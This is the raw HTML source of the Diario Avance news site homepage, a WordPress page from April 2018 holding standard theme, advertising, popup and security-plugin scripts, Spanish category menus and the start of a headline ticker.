
<!DOCTYPE html>
<!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="es-ES"> <![endif]-->
<!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8" lang="es-ES"> <![endif]-->
<!--[if IE 8]>         <html class="no-js lt-ie9" lang="es-ES"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="es-ES"> <!--<![endif]-->
    <head>
	<meta charset="UTF-8" />
	<meta name="_mg-domain-verification" content="b8d43844dadd86509e3f181a3f2e74d9" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-3138843091675303",
    enable_page_level_ads: true
  });
</script>
	<title>Diario Avance</title>
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://diarioavance.com/xmlrpc.php" />
	
		<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	        <link rel="stylesheet" type="text/css" href="http://diarioavance.com/wp-content/themes/multinews/css/print.css" media="print" />
    		<link rel="shortcut icon" href="http://diarioavance.com/wp-content/uploads/2015/01/ico.jpg" />
			<link rel="apple-touch-icon" href="http://diarioavance.com/wp-content/uploads/2015/01/icono.jpg" />
		
		<meta property="og:image" content=""/>
		<meta property="og:title" content="Principal"/>
	<meta property="og:type" content="article"/>
	<meta property="og:description" content=""/>
	<meta property="og:url" content="http://diarioavance.com/"/>
	<meta property="og:site_name" content="Diario Avance"/>
		
		<!--[if lt IE 9]>
	<script src="http://diarioavance.com/wp-content/themes/multinews/framework/helpers/js/html5.js"></script>
	<script src="http://diarioavance.com/wp-content/themes/multinews/framework/helpers/js/IE9.js"></script>
	<![endif]-->
		 
<link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Diario Avance &raquo; Feed" href="http://diarioavance.com/?feed=rss2" />
<link rel="alternate" type="application/rss+xml" title="Diario Avance &raquo; RSS de los comentarios" href="http://diarioavance.com/?feed=comments-rss2" />
<link rel="alternate" type="application/rss+xml" title="Diario Avance &raquo; Principal RSS de los comentarios" href="http://diarioavance.com/?feed=rss2&#038;page_id=37732" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/diarioavance.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='pmpro_frontend-css'  href='http://diarioavance.com/wp-content/plugins/paid-memberships-pro/css/frontend.css?ver=1.9.4.3' type='text/css' media='screen' />
<link rel='stylesheet' id='pmpro_print-css'  href='http://diarioavance.com/wp-content/plugins/paid-memberships-pro/css/print.css?ver=1.9.4.3' type='text/css' media='print' />
<link rel='stylesheet' id='fontawesome-css-css'  href='http://diarioavance.com/wp-content/plugins/accesspress-social-counter/css/font-awesome.min.css?ver=1.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='apsc-frontend-css-css'  href='http://diarioavance.com/wp-content/plugins/accesspress-social-counter/css/frontend.css?ver=1.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://diarioavance.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0' type='text/css' media='all' />
<link rel='stylesheet' id='sb_instagram_styles-css'  href='http://diarioavance.com/wp-content/plugins/instagram-feed/css/sb-instagram.min.css?ver=1.6' type='text/css' media='all' />
<link rel='stylesheet' id='sb-font-awesome-css'  href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='wabtn-style-css'  href='http://diarioavance.com/wp-content/plugins/whatsapp/style.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='main-css'  href='http://diarioavance.com/wp-content/themes/multinews/css/main.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='plugins-css'  href='http://diarioavance.com/wp-content/themes/multinews/css/plugins.min.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='responsive-css'  href='http://diarioavance.com/wp-content/themes/multinews/css/media.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://diarioavance.com/wp-includes/css/dashicons.min.css?ver=4.9.4' type='text/css' media='all' />
<link rel='stylesheet' id='scroll-triggered-boxes-css'  href='http://diarioavance.com/wp-content/plugins/scroll-triggered-boxes/assets/css/styles.min.css?ver=2.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_custom_css-css'  href='http://diarioavance.com/wp-content/uploads/js_composer/custom.css?ver=4.3.4' type='text/css' media='screen' />
<link rel='stylesheet' id='ulp-css'  href='http://diarioavance.com/wp-content/plugins/layered-popups/css/style.min.css?ver=5.91' type='text/css' media='all' />
<link rel='stylesheet' id='ulp-link-buttons-css'  href='http://diarioavance.com/wp-content/plugins/layered-popups/css/link-buttons.min.css?ver=5.91' type='text/css' media='all' />
<link rel='stylesheet' id='animate.css-css'  href='http://diarioavance.com/wp-content/plugins/layered-popups/css/animate.min.css?ver=5.91' type='text/css' media='all' />
<link rel='stylesheet' id='redux-google-fonts-css'  href='http://fonts.googleapis.com/css?family=Roboto%3A100%2C300%2C400%2C500%2C700%2C900%2C100italic%2C300italic%2C400italic%2C500italic%2C700italic%2C900italic%7CMerriweather+Sans%3A300%2C400%2C700%2C800%2C300italic%2C400italic%2C700italic%2C800italic%7COpen+Sans%3A400&#038;subset=latin&#038;ver=1518576870' type='text/css' media='all' />
<script type='text/javascript' src='http://diarioavance.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://diarioavance.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='https://api.w.org/' href='http://diarioavance.com/index.php?rest_route=/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://diarioavance.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://diarioavance.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.4" />
<link rel="canonical" href="http://diarioavance.com/" />
<link rel='shortlink' href='http://diarioavance.com/' />
<link rel="alternate" type="application/json+oembed" href="http://diarioavance.com/index.php?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=http%3A%2F%2Fdiarioavance.com%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://diarioavance.com/index.php?rest_route=%2Foembed%2F1.0%2Fembed&#038;url=http%3A%2F%2Fdiarioavance.com%2F&#038;format=xml" />
<script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//diarioavance.com/?wordfence_lh=1&hid=3BF86C8A1020C214BEE996D9A82C55C5');
</script><meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if IE 8]><link rel="stylesheet" type="text/css" href="http://diarioavance.com/wp-content/plugins/js_composer_ori/assets/css/vc-ie8.css" media="screen"><![endif]--><link href="//fonts.googleapis.com/css?family=Hammersmith+One:400&subset=latin-ext,latin" rel="stylesheet" type="text/css"><style>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</style>
		<script>
			var ulp_cookie_value = "1477926198";
			var ulp_recaptcha_enable = "off";
			var ulp_onload_mode = "every-time";
			var ulp_onload_period = "7";
			var ulp_onload_popup = "ab-6xMx4vAREokt3AQV*ab-6xMx4vAREokt3AQV";
			var ulp_onload_delay = "0";
			var ulp_onload_close_delay = "0";
			var ulp_onexit_mode = "none";
			var ulp_onexit_period = "5";
			var ulp_onexit_popup = "";
			var ulp_onscroll_mode = "none";
			var ulp_onscroll_period = "5";
			var ulp_onscroll_popup = "";
			var ulp_onscroll_offset = "600";
			var ulp_onidle_mode = "every-time";
			var ulp_onidle_period = "5";
			var ulp_onidle_popup = "ab-6xMx4vAREokt3AQV*";
			var ulp_onidle_delay = "40";
			var ulp_onabd_mode = "none";
			var ulp_onabd_period = "5";
			var ulp_onabd_popup = "";
		</script><style type="text/css">
/* Custom Styles for Box 165515 */
.stb-165515 {
background: #1e73be !important;
color: #ffffff !important;
border-color: #dd3333 !important;
border-width: 0px !important;
max-width: 300px;
@media ( max-width: 300px ) { #stb-165515 { display: none !important; } }
}

</style>

<style type="text/css" title="dynamic-css" class="options-output">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</style>	<style type="text/css" class="multinews-custom-dynamic-css">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</style>
</head>
    <body class="home page-template-default page page-id-37732 pmpro-body-has-access both-sidebars-right both-sides-true hst1 fade-imgs-in-appear no-bnmenu post-page-layout4 mom-body wpb-js-composer js-comp-ver-4.3.4 vc_responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage">
        	<!--[if lt IE 7]>
            <p class="browsehappy">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
        <![endif]-->
    	                <div class="fixed_wrap"><!--fixed layout-->
            <div class="wrap clearfix"><!--wrap-->
                <header class="header"><!--Header-->
                
                <div id="header-wrapper"><!-- header wrap -->
				<div class="top-bar"><!--topbar-->
    <div class="inner"><!--inner-->
<div class="today_date">
<p>1 abril, 2018</p>
</div>

                <ul id="menu-avance" class="top-menu"><li id="menu-item-37576" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-depth-0"><a href="http://diarioavance.com/?page_id=37573">Publicidad<span class="menu_bl" style="background:;"></span></a></li>
<li id="menu-item-37577" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-depth-0"><a href="http://diarioavance.com/?page_id=37571">Nosotros<span class="menu_bl" style="background:;"></span></a></li>
<li id="menu-item-37580" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-depth-0"><a href="http://diarioavance.com/?page_id=37575">Directorio<span class="menu_bl" style="background:;"></span></a></li>
</ul>  
    <div class="mom_visibility_device device-top-menu-wrap mobile-menu">
      <div class="top-menu-holder"><i class="fa-icon-align-justify mh-icon"></i></div>
      <ul id="menu-avance-1" class="device-top-nav"><li id="menu-item-37576" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-depth-0"><a href="http://diarioavance.com/?page_id=37573">Publicidad<span class="menu_bl" style="background:;"></span></a></li>
<li id="menu-item-37577" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-depth-0"><a href="http://diarioavance.com/?page_id=37571">Nosotros<span class="menu_bl" style="background:;"></span></a></li>
<li id="menu-item-37580" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-depth-0"><a href="http://diarioavance.com/?page_id=37575">Directorio<span class="menu_bl" style="background:;"></span></a></li>
</ul>     </div>
    
                
<div class="top-bar-right">
</div>
            
        </div><!--inner-->
    </div><!--topbar-->                    
                    <div class="header-wrap"><!--header content-->
                        <div class="inner"><!--inner-->
                                                    <div class="logo" itemscope="itemscope" itemtype="http://schema.org/Organization">
                                
                                                                <img class="print-logo" itemprop="logo" src="http://diarioavance.com/wp-content/uploads/2017/01/logo3.png" alt="Diario Avance"/> 
                                                                
                                <a href="http://diarioavance.com" itemprop="url" title="Diario Avance">
                                                                		<img itemprop="logo" src="http://diarioavance.com/wp-content/uploads/2017/01/logo3.png" alt="Diario Avance"/>  
                                                                
                                  
                                		<img itemprop="logo" class="mom_retina_logo" src="http://diarioavance.com/wp-content/uploads/2015/01/ico1.jpg.png" width="394" height="72" alt="Diario Avance" />
                                                                </a>
                                <meta itemprop="name" content="Diario Avance">
                            </div>
                                                    
			                <div class="header-banner">
						<script type="text/javascript">
		jQuery(document).ready(function($) {
			jQuery('.ads-rotator-id-323 .mom-ads-inner').boxSlider({
				autoScroll: true,
				timeout: 6000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.ads-rotator-id-323 .adr-next',
				prev: '.ads-rotator-id-323 .adr-prev'
				
			});

		});
	</script>
		<div class="mom-ads-wrap">
	<div class="mom-ads ads-layout-rotator ads-rotator-id-323" style="width:728px; height:90px;">
	<div class="adr-arrows"><span class="adr-prev"><i class="enotype-icon-arrow-left4"></i></span><span class="adr-next"><i class="enotype-icon-arrow-right4"></i></span></div>	<div class="mom-ads-inner">
		
				<div class="mom-ad" data-id="43977" style="width:728px; height:90px; ">
					<a href="https://twitter.com/mercadoavance24" target="_blank"><img src="http://diarioavance.com/wp-content/uploads/2015/04/GIF-MERCADO-AVANCE.gif" alt="principal"></a>
		 	</div><!--mom ad-->
					<div class="mom-ad" data-id="43977" style="width:728px; height:90px; ">
					<a href="#" target=""><img src="http://diarioavance.com/wp-content/uploads/2015/04/nuevo-gif-panaderia-modelo.gif" alt="principal"></a>
		 	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
			    </div>
			                            
                        </div><!--inner-->
                    </div><!--header content-->
                </div><!-- header wrap -->
					
					<nav id="navigation" class="navigation dd-effect-slide" data-sticky_logo="" data-sticky_logo_width="" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement"><!--Navigation-->
<div class="inner"><!--inner-->
	<a href="http://diarioavance.com" class="sticky_logo"><img src="" alt="Diario Avance"></a>
		<ul id="menu-temas-del-dia" class="main-menu main-default-menu mom_visibility_desktop"><li id="menu-item-37581" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-iconsOnly menu-item-depth-0"><a href="http://diarioavance.com/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Inicio</span><span class="menu_bl" style="background:#ffffff;"></span></a></li>
<li id="menu-item-38508" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=19">Temas del día<span class="menu_bl" style="background:#dd9933;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38509" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=31">Día a día</a></li>
	<li id="menu-item-38510" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=29">Tema del día</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38502" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=2">Política<span class="menu_bl" style="background:#eeee22;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38503" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=9161">Estadal</a></li>
	<li id="menu-item-38504" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=4">Municipales</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38481" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=12">Enfoques<span class="menu_bl" style="background:#81d742;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38482" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=13">Comunidad</a></li>
	<li id="menu-item-38483" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=14">Consumo</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38488" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=6">Avances<span class="menu_bl" style="background:#9b0000;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38489" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=7">En el mundo</a></li>
	<li id="menu-item-38490" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=8">En el país</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38491" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=9">De tú Interés<span class="menu_bl" style="background:#1e73be;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38531" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=9277">Tecnología</a></li>
	<li id="menu-item-38492" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=11">Educación</a></li>
	<li id="menu-item-38493" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=10">Salud</a></li>
	<li id="menu-item-38499" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=57">Ambiente</a></li>
	<li id="menu-item-38500" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=55">Curiosidades</a></li>
	<li id="menu-item-38501" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=56">Turismo</a></li>
	<li id="menu-item-146547" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=51100">Publicidad</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38494" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=17">Deportes<span class="menu_bl" style="background:#8224e3;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38495" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=23">Internacional</a></li>
	<li id="menu-item-38496" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=24">Nacional</a></li>
	<li id="menu-item-38497" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=25">Regional</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38485" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=16">Artes<span class="menu_bl" style="background:#00d643;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38486" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=27">Cultura</a></li>
	<li id="menu-item-38487" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=26">Farándula</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38505" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=15">Sucesos<span class="menu_bl" style="background:#000000;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38506" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=22">Casos</a></li>
	<li id="menu-item-38507" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=21">Ultima Hora</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
</ul>                        	
         <div class="mom_visibility_device device-menu-wrap">
            <div class="device-menu-holder">
                <i class="momizat-icon-paragraph-justify2 mh-icon"></i> <span class="the_menu_holder_area"><i class="dmh-icon"></i>Menu</span><i class="mh-caret"></i>
            </div>
        <ul id="menu-temas-del-dia-1" class="device-menu"><li id="menu-item-37581" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-iconsOnly menu-item-depth-0"><a href="http://diarioavance.com/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Inicio</span><span class="menu_bl" style="background:#ffffff;"></span></a></li>
<li id="menu-item-38508" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=19">Temas del día<span class="menu_bl" style="background:#dd9933;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38509" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=31">Día a día</a></li>
	<li id="menu-item-38510" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=29">Tema del día</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38502" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=2">Política<span class="menu_bl" style="background:#eeee22;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38503" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=9161">Estadal</a></li>
	<li id="menu-item-38504" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=4">Municipales</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38481" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=12">Enfoques<span class="menu_bl" style="background:#81d742;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38482" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=13">Comunidad</a></li>
	<li id="menu-item-38483" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=14">Consumo</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38488" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=6">Avances<span class="menu_bl" style="background:#9b0000;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38489" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=7">En el mundo</a></li>
	<li id="menu-item-38490" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=8">En el país</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38491" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=9">De tú Interés<span class="menu_bl" style="background:#1e73be;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38531" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=9277">Tecnología</a></li>
	<li id="menu-item-38492" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=11">Educación</a></li>
	<li id="menu-item-38493" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=10">Salud</a></li>
	<li id="menu-item-38499" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=57">Ambiente</a></li>
	<li id="menu-item-38500" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=55">Curiosidades</a></li>
	<li id="menu-item-38501" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=56">Turismo</a></li>
	<li id="menu-item-146547" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=51100">Publicidad</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38494" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=17">Deportes<span class="menu_bl" style="background:#8224e3;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38495" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=23">Internacional</a></li>
	<li id="menu-item-38496" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=24">Nacional</a></li>
	<li id="menu-item-38497" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=25">Regional</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38485" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=16">Artes<span class="menu_bl" style="background:#00d643;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38486" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=27">Cultura</a></li>
	<li id="menu-item-38487" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=26">Farándula</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-38505" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item menu-item-depth-0"><a href="http://diarioavance.com/?cat=15">Sucesos<span class="menu_bl" style="background:#000000;"></span></a>
<ul class="sub-menu ">
	<li id="menu-item-38506" class="menu-item menu-item-type-taxonomy menu-item-object-category active menu-item-depth-1"><a href="http://diarioavance.com/?cat=22">Casos</a></li>
	<li id="menu-item-38507" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-depth-1"><a href="http://diarioavance.com/?cat=21">Ultima Hora</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
</ul>        </div>
        <div class="clear"></div>
</div><!--inner-->
</nav><!--Navigation-->                    
                    <div class="breaking-news"><!--breaking news-->
    <div class="inner"><!--inner-->
        
        <div class="breaking-news-items">
        <span class="breaking-title">Titulares</span>
        <div class="breaking-cont">
            <ul class="webticker">
                                    <li itemscope="" itemtype="http://schema.org/Article"><h4 itemprop="name"><span class="enotype-icon-arrow-right6"></span><a itemprop="url" href="http://diarioavance.com/?p=165459" rel="bookmark">Calle Las Cadenas sumergida en la oscuridad</a></h4></li>
